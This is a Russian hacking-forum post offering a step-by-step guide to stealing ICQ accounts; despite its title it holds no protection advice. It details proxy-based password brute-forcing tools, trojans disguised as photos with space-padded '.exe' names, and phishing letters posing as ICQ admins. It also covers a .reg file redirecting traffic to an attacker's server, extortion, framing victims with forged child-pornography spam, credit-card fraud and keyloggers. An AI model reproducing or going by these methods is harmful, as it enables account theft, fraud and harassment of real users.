ANTICHAT - Cпособы защиты и угона ICQ

Вот решил создать стать по угону и взлому ICQ!

Поехали:

V-ListMaker или Powerful GeneratoR. Эта прога нам нужна для того, чтоб генерить, сводить, форматировать юины/пассы большими пачками. Очень большими .

1) Для начала посоветую запустить прогу и на первой вкладке GeneratoR (стоит по умолчанию) в окошечке Uinz около поля "mask" написать "777****" (без кавычек).

2) Пониже, где "count" задать интервал 7-7.
3) Жмем на кнопочку "Generate". Вводим имя файла, в который он сохранит нам список уинов, жмём enter и ждем. Обычно чуть меньше минуты. Результат: получаем все юины от 7770000 до 7779999.

4) Создаем файл с паролями. Просто txt файл, в котором записываем, например, такие строки:

Цитата:

password
12345
qwerty

5) Идем во вкладку JoineR.

6) Жмем Load Uins File. Выбираем наш, сгенеренный в пункте 3 файл с юинами.

7) Жмем Load Pass File. Выбираем наш, созданный в пункте 4 файл с паролями.
8) Кликаем на "Save Result To..." и вводим имя файла, типа ser1.txt (типа серия 1).

9) Жмем Start и ждем пока ленивый ползунок доползет до финиша. (прога работает хорошо, генерит в отдельном потоке, поэтому мона заниматься своими делами пока генерим без всяких тормозов).

10) Прогу мона закрыть кружком в правом верхнем углу .

У нас получилось вот так:

Цитата:

7770000;password
7770000;12345
7770000;qwerty
7770001;password

и так до конца. Теперь наш файл вида Uin;pass готов, и теперь будем засовывать его ipdbrut'у.

IPDBrute

Прога создана именно для угона ICQ

1) Запускаем прогу, жмем "Config"

2) Source... - Там вы указываете путь в нашему замечательному файлу ser1.txt.
3) Dump INcorrect... - в этот файл будут сваливаться плохие пассы. (Советую перед каждым запуском ipd очищать это дело, тк при старте он его тока тормозит.)
4) Dump CORRECT... - в этот файл, если повезет упадет пяток-десяток ХОРОШИХ ась. В п. 3 и 4, советую не менять имена файлов (good и bad), тока приписать к ним полный путь.

5) Threads - потоки. Зависит от кол-ва проксей (об этом позже), то есть если проксей у вас 100, то больше 200 потоков ставить не стоит. Например для dial-up'a 80 потоков вполне достаточно. Для выделинки можно и раз в десять побольше, но и прокси серверов надо будет намного больше.

6) Proxies - Прокси. Можно купить или же добыть как добываю я в разделе анонимнойсть прочитайте мою стастью способы добычи прокси и сами всё поймёте для непонятливых снял видео

7) Птица "Clean up every ... minutes". Когда вы запускаете IPDBrute, то он вам показывает "Proxies: 0, good: 0, alive: 0", так вот alive - это количество рабочих проксей. до которых ему удалось достучаться. Для того чтобы он стечал по неработчим проксям и сделана птица "CleanUp". Т.е. каждые n минут он будет очищать список проксей, и оставлять только рабочие.

8) Жмем ОК, а в проге "Start". Вот и все. И оставляем это дело работать. Каждые пару часов можно подойти и полюбоваться (огорчиться) результатами (отсутствием оных ).

ICQ MultiPassword Changer

!!! WARNING !!! При массовой смене деталей вы потеряете все, что вы набрутили. Уины просто заморозят. Поэтому нефик вообще детали менять. Зашли, сменили пароль и e-mail. И успокойтесь. Вот и всё.

1) Раз и навсегда вписываем инфу (Имя, Фамилия, Ник, Мыло (сразу примаком оно не становиться (хотя иногда и бывают глюки), но сделать мона потом) и пароль (советую менять на каждую пачку юинов).

2) Кнопку "Settings" советую не трогать, там ниче интересного нет . (только если у вас вариант 5)

3) Жмем Load Uins, выбираем файл good.txt.
4) Жмем старт и смотрим внимательно в логи. Если будет появляться после каждой попытки серенькая надпись "Pass&Detalies changed", то все ок.

5) Если другая, то после окончания начинаем с первой не смененной записи (чтоб начать с какой-то определенной записи (юина), просто в списке кликните один раз на него и нажмите старт). И так делаем пока все не смениться (обычно, у меня на 5-6 пассов 1 сходу не меняется. Чтоб избежать этих сложный махинаций, сходим в Settings и установим Timeout в два раза больше чем сейчас (не 10.000, а 20.000 или 30.000).

Дополнительная информация, для улучшения результатов

1) Можно взламывать используя самые протые пароли. Потому как ламеры были, ламеры едят и будут есть Для особо однаренных объясняю, что легкие пароли это : password, qwerty, 12312312, 123456, mypass, etc...

2) Особых люди, у которых есть халявная выделинка, можно использовать словари. Тогда конечно возможность взлома возрастает в несколько раз, но если не один пароль не подойдет вы потеряете очень много времени.

3) IPDBrute очень много трафика кушает. Поэтому используем аккуратно и не на работе, чтобы потом шеф надавал волшебных пендюлей

4) Если вы видите в ipd показывается "passwords....good: 1" или 2 и больше, не важно, не стоит рубить ее 3 пальцами. Почему? Все просто. Прога могла еще не записать хорошие пассы в файл, а если ее останавливать не кнопкой "Stop", а 3 пальцами, то она и не запишет . И вы останетесь без пассов. Поэтому если все-таки решились рубить, посмотрите на файл good.txt, размер его и прикиньте, соответствует он кол-ву паролей. (один шестизнак с пассом 5-8 знаков занимает 12-15 байт). Если все ок, рубите намертво.

Кража опредленного уина

Вот бывает иногда что хочется именно ЕЁ Только эту асю я хочу... Вот для таких случаев несколько способом поиметь именно ту, о которой вы всегда мечтали.

Способ куль-хацкерский. Вы добавляете юзера с нужным юином в контакт. Смотрите его IP. Чтобы его увидеть необходимо, чтобы у того пользователя стояло разрешение на установление прямых IP соединений с другими пользователями ICQ. А чтобы IP начал показыватся в User Details'ах качаем и устанавлием патч для icq 2003 build 3916 от ven000m'a (www.ven000m.ru) Затем берете программу ip2uin из раздела программы или прямо вот по этой ссылке, указываете ей айпи и она просканит на запущенность аси. Потом попытаеся присоединиться к удаленному компу по открытому порту. которая она будет сканировать, в указанном вами диапазоне. Процент на это 1 из 100, при уловии что на удаленном компьютере не запущен никакой FireWall. Если сработало, то забираете юин и вопрос считаем исчерпанным . Если не удался (скорее всего), берете любой сетевой сканер и сканируете на расшаренные реусурсы. Процент попадания около 10 из 100. Если сработало, то из папки аси вырываете все .dat файлы (вид: uin.dat, типа 111222.dat, 84 092.dat итд) и к себе а винт в папку с установленной асей. Потом из раздела "программы" или по этой ссылке берем программу расшифровки dat-файла и юин у вас в кармане.

Способ женский + научный. Юзера опять в контакты. Затем открываем профиль юзера и открываем блокнот (notepad). И все слова из профиля, вроде ника, имени, фамилии, страны, города, адреса и всяческих комбинаций этого дела вносим через enter в тектовый файл. Затем смотрим мыло. Идем в яндекс или гугл и ищем это мыло. Скорее всего вы найдете много информации на всяких форумах, домашних страничках. Всю информацию в текстовый файл (не прямым текстом , а отдельные слова до 8-ми символов включительно). Также можно войти с ним в контакт, познакомиться из того, что он вам расскажет добавить слов. А в идеале, если у вас есть какой-нить форум или чат или что-то такое, где надо регистрироваться, ЗАСТАВЬТЕ его там зарегаться. Тогда он оставит там пароль. А люди как правило используют один и тот же пароль везде. Так что на 90% он ваш. По-любому, добавьте этот пароль в словарь. И добавьте туда этот юин (в смысле, ко всем вашим паролям добавьте юин, т.к. многие пользователи ставят пароль такой же как юин). За 10-30 минут "работы" у вас должен получиться список слов эдак на 100-400. Потом добавьте туда пару десятков просто общеупотребляемых слов, вроде sex, rock, metal, city, qwerty, asdfg и все в этом роде. После этого брутим (ниже) на эти пассы. Если юин у вас, то все свободны . Если нет, то способ следующий.

Способ мыльница. Работает, только если у юзера есть мыло (e-mail). Смотрим в профиле юзера, есть-ли основное мыло. Если есть, то читаем. Смотрим внимательно на мыло. Если оно вида "хрен_знает_что.какой-нить_известный_бесплатный_� �ыльный_домен", то нам повезло. Шанс на это 1 из 500. Например, если мыло fsdlhfslfhlsjghlp@yandex.ru Тогда скорее всего этого мыла в действительности не существует. Если это так, идем на этот сервак (в нашем случае, яндекс.ру) и регистрируем это мыло. Идем сюда и говорим что пароль бы нам надо получить. Указываем наш юин и ваше только что созданное мыло и жмем заветную кнопку. Через минуту у вас в ящике должен лежать пароль. Если все ок и юин ваш, до свидания .

Способ страшный. Тут все просто. Добавляем юзера в контакт и пишем ему открытым текстом на всех доступных языках: мне нужен твой юин, меняю на другой 6-знак. Я могу спокойно сломать вашу асю, но мне этого не хочется. Так что у вас 3 дня подумать. И предлагайте юин покрасивше. Потом меняете.

Способ спам. Опять же, только если у выбранного вами уина есть primary e-mail. Берем програмку для отправки писем с чужого адреса. Эти программки пожно взять либо в разделе "программы", либо вот они : Анонимное мыло v1.1.2 или FlameBomber, но FlameBomber на основе трояна. поэтому вырубите антивирусник, когда будете её запускать. Вот... А теперь с его адреса рассылаем кучу спама через smtp сервер его мыла. И идем жаловаться в суппорт сервера, на котором его мыло. Жалуемся, жалуемся, а потом его отрыбают и регистрируем мыло на себя

Троян. Что тут можно сказать. Все что Вам нужно - это хороший троян + немного смекалки. Трой не обязательно должен не ловиться антивирусом. Как Вы думаете, какой процент того что у данного юзера стоит антивирус, тем более обновленный если всего пользователей в Мире около 295 миллионов, а "защищенных" из них 17.750.000 я думаю всего 16% приблизительно . Если он все же стоит, тогда придется применять не этот метод или искать троян которого не ловит антивирус. Допустим антивируса нету ...что делаем? Не сразу же кидать троя. Придется уговаривать. Как это сделать? Скажите, что посылаете прикольную фотку. Но если мы пошлем ему троя, он же сразу увидит расширение *.exe. Поэтому делаем следующее: берем сервак трояна, допустим под названием "server.exe" и переделываем его следующим образом: Вместо server пишем photo, но как быть с расширением? После слова photo, ставим точку, и пишем расширение jpg, а потом ставим кучу пробелов, то есть получается photo.jpg......................................... exe. Только вместо точек пробелы. Дело в том, что когда ламер получает файл и хочет его сохранить, имя файла получается настолько длинное, что видно только photo.jpg (посыл через ICQ). Естественно, если растянуть окно закачки файла, то все будет видно, но я Вас уверяю, что это делает всего 1, максимум 2 процента из 100. Ламер открывает файл и начинает ныть, что у него ничего не открывается. Вы говорите, что понятии не имеете в чем дело и что у Вас все гуд. Потом делаете так: заходите в С:program filesicq, а дальше смотрите сами где находится его dat файл. Если это аська 99b, то в папке Db99, если аська 2000a или 2000b, то в папке 2000. Там лежит файл под названием "номер его аськи.dat". Закачиваете его к себе и в общем все. Теперь надо его расшифровать. Для этого есть много программ, лучшая из которых на мой взгляд icq information v1.3. Там все будет понятно. Так, взяли пароль, хотя нет, Вы же взяли dat, а знаете что это означает? Весь его контакт лист и хистори будут у Вас (при условии, что у Вас стоит версия более поздняя чем у него, или хотя бы такая же. Если у Вас 99b а у него 2000*, тогда контакт не удастся взять). Регим асю, меняем пароль и сразу же меняем Priamary E-mail на свое мыло, что бы он потом не получил пароль от Мираба (AOL`а) по мылу. И все...

Вот и всё!

Цитата:

Если тема понравилась не скупитесь жмите на + и на спасибо! Буду вам очень благодарен

(с) Kvatra

Способ #1
Номера первого миллиона регистрировались около 5 лет назад. Поэтому, если пользователь не менял настроек и информации с первой регистрации, то у вас есть шанс обнаружить, что его email-адрес (если он был зарегистрирован на халявном сервере типа yahoo или же hotmail) аннулирован по бездействию. Тогда Вам требуется просто зарегистрить такой же адрес, пойти на http://www.icq.com/password, ввести номер жертвы - и пароль придёт к вам в свежесделанный почтовый ящик. Запустите ICQ.Выберите меню Add/Find users. Теперь выберите Main search/Search by ICQ number (UIN). Введите номер, который вы хотите получить (чем старее номер, тем больше шансов на удачу). Жмите Info. Теперь смотрите на e-mail этого человека. Он должен быть взят на халявном сервере.Если он взят не на халявных серверах - жмите BACK и начните с начала.Теперь - вам нужно пойти на этот сервер и проверить существование данного e-mail'а. Если он еще существует - то идите к началу. Если же его нет - то вы почти победили. Зарегистрируйте e-mail этого человека (полностью идеентичный). И последнее - идите в раздел для забывчевых, вводите этот UIN и ваш "новый" e-mail. В ближайшее время вам вышлют пароль!

Способ #2
Существует другой, более сложный варинт лишeния пользователя его e-mail. Есть конкретные правила поведения пользователей сервиса (например: e-mail - нельзя спамить, web - нельзя открыто размещать детское порно), нарушая которые пользователи, как правило, лишаются права на адрес или веб-страницу. Кто мешает вам написать несколько десятков тысяч воззваний к легализации детской порнографии и проституции от имени duke@something.com? Установите тип сервера, узнайте язык общения с ним клиента, и пошлите все эти возвания самому себе и своим друзьям (или на другие емейл аккаунты), указав обратным адресом duke@something.com. Далее вы и ваши друзья должны будете переправить все "полученное" от Duke по адресу администратора домена с нотой протеста против легализации и с просьбой наказать виновного. "Послания" Duke следует уничтожить, и в завязавшейся переписке с администрацией сообщить, что следов преступения осталось мало: вы все стерли, так как были шокированны, и праведный гнев обуял вас так сильно, что всем подьездом вас держали. Попросите администратора обязательно держать вас в курсе дела. Далее пошлите сообщение того же самого содержания (используя обратный адрес Duke) другим вашим друзьям или на другие почтовые аккаунты, и напишите администрации о этом безобразии в других словах. Создайте видимость, что этот Duke шлет тысячами сообщения о нелегальных вещах группе незнакомых между собой людей... Прогнозирую до 80% успеха, у Duke отнимут аккаунт, о чем вам заявят как о большом достижении в борьбе со спамерами и рассадниками порнографии. Вы в тот же день зарегистрируете аккаунт на себя и заявите о потере пассворда. В итоге у вас - долгожданный UIN и твердая уверенность в том, что если вы имеете бесплатный емейл - никто никогда у вас его не отнимет.
Будте внимательны, каждое электронное сообщение содержит заголовок (header), представляющий из себя служебную информацию о дате отправления сообщения, названии почтовой программы, IP адресе машины, с которой было отправлено сообщение, и т.д. Поэтому исполюзуйте для этих целей специальные программы для спама, которые способны скрыть эту информацию. Вот некоторые из них: SendIt, EzyMassMailer, CTMailer, MailThemPro и запускайте их через прокси сервер. У большенства спамеров отсутствует в настройках возможность работать через прокси, но это легко поправить с помощью программы SocksCap (программа, позволяющия запускать через сокет любое приложение, о нем не знающее), для коннекта используется проски SOCKS-4 или SOCKS-5 port:1080. Из-под SocksCap вы можете запускать сканеры портов и практически любые программы, скрывая свой реальный IP. Это очень актуально сегодня, т.к многие провайдеры за эти "маленькие шалости" лишают пользователей доступа в сеть (

Способ #3
Этот способ требует значительных усилий и основан на том, что многие люди используют в качестве пароля какое-нибудь легковычисляемое слово, например свой ник или имя. Запустите ICQ. Выберите меню Add/Find users. Теперь выберите Main search/Search by ICQ number (UIN). Введите номер, который вы хотите получить. Жмите Info. Запомните Uin, ник, настояшее имя пользователя и другие детали. Нажмите на значок ICQ и выберите Add/Change Current User. Жмите Add another registered user, Next, Next. Теперь вводите UIN, а в качестве пароля - ник, имя или какую-то другую относящуюся к данному пользователю информацию. Вполне возможно, что вам повезёт. Вообще говоря, существует также целый ряд паролей, особенно "любимых" малоопытными пользователями, например "Password", "qwerty", "12345" и т.д. Хотя подбор паролей - это тема отдельной статьи, и мы не будем здесь подробно на этом останавливаться.

Способ #4
Этот метод основан на том, что многие пользователи любят указывать почтовый ящик на несуществующих серверах. Примером могут служить ящики aaaaa@bbbbb.com. Для получения пароля этой аси вам достаточно, используя любую генерилку кредитных карточек, купить домен www.bbbbb.com и, когда он будет задействован, получить письмо с паролем. Единственное условие: к процессу регистрации домена нужно подходить с умом. Не везде вам позволят купить домен по несуществующей кредитке. Для этого я порекомендовал бы www.awc.net. Зарегистрированный там домен гарантированно просуществует пару недель - достаточный срок для получения письма.

Способ #5
Если почтовый ящик пользователя существует, и отобрать его никак не получается, можно попробовать его попросту взломать. Конечно, если этот ящик находится у провайдера пользователя, то сделать это будет не так уж и просто. Но если он находится на одном из бесплатных mail-серверов, внимательно следите за сообщениями о новообнаруженных "дырах": если вам повезёт, вы узнаете способ доступа к интересующему вас почтовому ящику раньше, чем эта "дыра" будет закрыта. А дальше всё просто: вам достаточно забрать из ящика письмо с паролем раньше, чем его заметит владелец ящика. А в качестве примера подобного взлома прочтите эту статью.

Способ #6
Если почтовый ящик защищён хорошо, и взломать его нельзя, можно попробовать получить его пароль. Дело в том, что людям свойственно забывать многие полезные вещи, в том числе и пароли. Поэтому у любой службы бесплатных почтовых ящиков есть некий механизм, с помощью которого можно восстановить "забытый" пароль. При этом вам придётся подтвердить, что вы и есть хозяин того самого ящика. Как правило, для этого необходимо знать краткую информацию о пользователе, такую как имя, фамилия, дата рождения, адрес и т.д. Кроме того, почтовые службы практикуют следующий механизм: при регистрации пользователю предлагается сформулировать некий вопрос личного плана и дать на него ответ. Если потом пользователь заявит об утере пароля, ему будет задан этот вопрос, и если ответ совпадёт, это будет считаться подтверждением личности пользователя. Так вот, 90% пользователей используют вопросы типа "Как зовут мою собаку?", "Какая марка моего автомобиля?" и т.п., причём уже через год после регистрации они гарантированно не помнят, какой именно вопрос ими был указан. Поэтому, достаточно получасового общения по аське, чтобы как бы случайно сказать что-то вроде "Я очень люблю свою собаку! Она породы волкодав, кличка Дружок. А у тебя есть собака? А какой породы? А как её зовут?". Если правильно выбрать время и задать вопрос как бы между делом, пользователь наверняка ответит на него, ничего не заподозрив. Точно таким же образом можно узнать и всю остальную информацию, необходимую для получения "забытого" пароля, если, конечно, она не указана в пользовательских деталях ICQ. Если системы автоматического восстановления забытого пароля в данной почтовой службе нет, вам придётся написать слёзное письмо постмастеру, где необходимо будет указать всё те же данные о пользователе. Почтовые мастера - они люди добрые, они вам помогут.

Способ #7
Послание якобы от системного администратора (icq_admin@icq.com). Пользователь Алекс UIN 100001, занимается своими обычными делами в режиме онлайн. Он проверяет свой почтовый ящик и обнаруживает там письмо от системного администратора. В письме говорится о том, что ввиду наличия прорех в компьютерной безопасности, пароли пользователей будут теперь изменены: “Ваш новый пароль D4YIL”, — написано в полученном Алексом послании. Вы можете изменить его сами, прямо сейчас, чтобы не терять время и не подвергать себя опасности, или он вступит в силу через 30 минут после получения вами этого уведомления. He забудьте его! Не раскрывайте его никому! Компьютерная безопасность — очень важный аспект, которым нельзя пренебрегать! Затем вы жмете на ICQ "Add another registered user", вводите выбранный UIN и посланый вами пароль. Если Алекс поверил, то вы получите долгожданный UIN. Возможны и другие разновидности этого способа: например, можно написать подобное письмо, но с требованием установить в качестве Primary E-mail какой-либо адрес, выгядящий достаточно убедительно, но зарегистрированный на вас. Либо можно предложить пользователю внести в список серверов ICQ ip-адрес вашего сервера, мотивируя это перегруженностью сервера icq.mirabilis.com. Можно использовать и другие подходы к пользователю - здесь всё ограничено только вашей фантазией. "На ура" проходят также и письма "от постмастера" почтовой службы, которую использует жертва. Например, если почтовый ящик пользователя расположен у его провайдера, и он использует POP3-доступ, подойдёт письмо об изменении ip-адреса почтового сервера. Если жертва внесёт указанные вами изменения в настройки своей почтовой программы, то он сам выложит вам свой пароль, связавшись с любезно предоставленным вами подставным POP3-сервером.

Способ #8
Этот путь наиболее широко распространён. Берётся какой-либо свежий почтовый троянец - например, последняя версия Naebi Soseda, Stealth, Shtirliz, Hooker, GIP (работают под 95/98/NT). Используя Microangelo98 , у него меняется иконка на иконку от графического файла (или любую другую на ваше усмотрение), и сервер трояна после всех манипуляций переименовывается во что-то вроде "photo.jpg (куча пробелов) .exe". При передаче файла через ICQ будет видно только начало имени, и жертва так ничего и не заподозрит, пока не нажмёт на "open". Но тогда будет уже поздно. Обычно файл передаётся под видом фотографии после короткой беседы с жертвой. См. также FAQ по троянам на нашем сайте.

Способ #9
Если вы имеете представление о протоколах, по которым ICQ-клиент регистрируется на сервере при каждом подключении к сети, вы можете взять пароль непосредственно из перехваченного сетевого траффика. Для такого перехвата могут быть использованы различные способы. Если ваделец UINа находится в вашей локальной сети, вы можете применить сниффер . Если нет, попробуйте сделать так, чтобы он запустил на своём компьютере .reg-файл, содержащий (помимо полезных действий, например оптимизации файловой системы Windows) строки: [HKEY_CURRENT_USERSoftwareMirabilisICQDefaultPrefs] "Default Server Host"="Имя или ip-адрес вашего сервера" На этом сервере вам необходимо будет выделить из траффика всю нужную вам информацию, а затем перенаправить его на icq.mirabilis.com. То же самое можно сделать, используюя "фальшивый" прокси-сервер. Кстати, на многих хакерских сайтах сейчас можно найти списки анонимных прокси-серверов. Многие пользователи, желая скрыть свой ip, пользуются их услугами, не подозревая, что часть этих серверов принадлежит весьма любопытным владельцам, а то и спецслужбам некоторых стран. Причина интереса спецслужб проста: раз уж человек желает анонимности, значит ему есть что скрывать. И не надо устанавливать дорогостоющую аппаратуру у всех Интернет-провайдеров, как это пытаются сейчас сделать в России. Достаточно контролировать несколько десятков "анонимных" прокси - и "клиент" сам себя выдаст! Причём вычислить такое "прослушивание" абсолютно невозможно - ведь прокси выглядит абсолютно надёжным и анонимным. В принципе, он и является анонимным. Почти для всех. Кроме владельца. Не того, кто указан в базе данных WhoIs, а НАСТОЯЩЕГО владельца.

Способ #10
Удаленный доступ к компьютеру. Данный метод подразумевает некоторые навыки общения с программами и методами, предоставляющими возможности удаленного доступа к компьютеру, на котором установлена аська с интересующим вас номером. Обычно для этих целей используется троянские кони Back Orifice, NetBus, Sub7 и др. Но они получили слишком широкое распространение и теперь обнаружиавются антивирусами. Так что ищите менее распространенный. Кроме того, возможно удалённое подключение к компьютеру жертвы через 139-й порт по протоколу NetBIOS. Очень часто ресурсы, доступные через этот порт, вообще не имеют пароля, а если этот пароль и присутствует, подбирать его намного быстрее и удобнее, чем, например, регистрационный пароль ICQ. Для этого существует огромное количество специализированных программ, наиболее популярная - Legion . Вам нужно всего лишь получить системные файлы аськи. А именно: "номер_аси.dat и номер_аси.idx" из каталога "crogram filesicqdb". Это если ася проинсталлирована в каталог по умолчанию. Остальные файлы для этого UIN-на вы сможете сфабриковать из аналогичных файлов любого другого номера. После этого, корректно изменив информацию в системном реестре, вы сможете сконнектиться под данным номером.

Способ #11
Можно ли изменить пассворд чужого ICQ аккаунта без получения доступа к компьютеру его владельца? Когда-то, во времена icq98, это было возможно. Существовала программа для взлома ICQ под названием "ICQhijeck" (или "ICQhijeek"). При наличии IP жертвы, его UINa и номера порта для связи с клиентом, ICQhijeck посылал spoofed пакет, заявляющий о себе, что пакет принадлежит самому клиенту и несет в себе задачу смены пассворда. Пассворд выбирал нападающий. В конце концов Mirabilis убрал этот баг, но вдруг вам повезёт, и вы найдёте юзера, который не обновлял своего ICQ-клиента в течение последних двух лет.. .

Способ #12
Ещё одна старая уязвимость состояла в том, что при активированном ICQ homepage, был возможен доступ к локальным файлам, используя обратный путь к директориям. Начиная с 99-х версий, ICQ предоставляет пользователям новую, достаточно удобную и простую в реализации возможность - создать небольшой персональный веб-сервер. При этом, от пользователя требуется минимум усилий - достаточно выбрать в меню Services -> My ICQ Page -> Activate Homepage. При этом открывается доступ к виртуальному серверу, который по умолчанию расположен на 80 порту компьютера пользователя. Причём этот сервер, без всякой настройки, способен выполнить большинство функций, необходимых типичной домашней страничке. И все бы было хорошо, если бы ни одно: в ранних версиях icq был возможен доступ к любому файлу на компьютере пользователя, используя адреса вида: http://текущий.ip.адрес.пользовате� �я....../config.sys. Вообще говоря, обратный путь - одна из самых типичных ошибок http-серверов. Практически все известные веб-сервера имели тот или иной вариант этой ошибки в своих ранних версиях, и ICQ не стало исключением. Лишь начиная с версии 3.19 эта дыра была закрыта, и всесто доступа к файлам пользователя, обращение к подобным адресам стало приводить к стандартной ошибке 403 Forbidden. Тем не менее, пользователей со старыми версиями ICQ всё ещё можно встретить в сети.

Способ #13
Если у вас есть прямой доступ к компьютеру, на котором стоит интересующая вас ася (или находится любая другая нужная вам информация), просто принести на дискете и установите клавиатурного шпиона, например SAM 007, когда жертва не будет видеть. Вы сможете узнать что, где и когда набиралось на клавиатуре. У вас в руках будет вся интересующая вас информация.

Способ #14
В конце концов, ICQ UIN можно просто купить. При этом ваша совесть будет почти чиста - вы можете искренне убеждать себя, что купленный вами номер с самого начала принадлежал продавцу и не является краденым. Правда, в этом случае вы должны всегда быть готовы к тому, что в один прекрасный день объявится законный владелец вашего "нового" UINa, и деньги заплаченные за него, окажутся выброшенными на ветер. Да и никто не даст вам гарантию, что после успешно завершённой сделки, UIN не будет украден повторно, на этот раз уже у вас.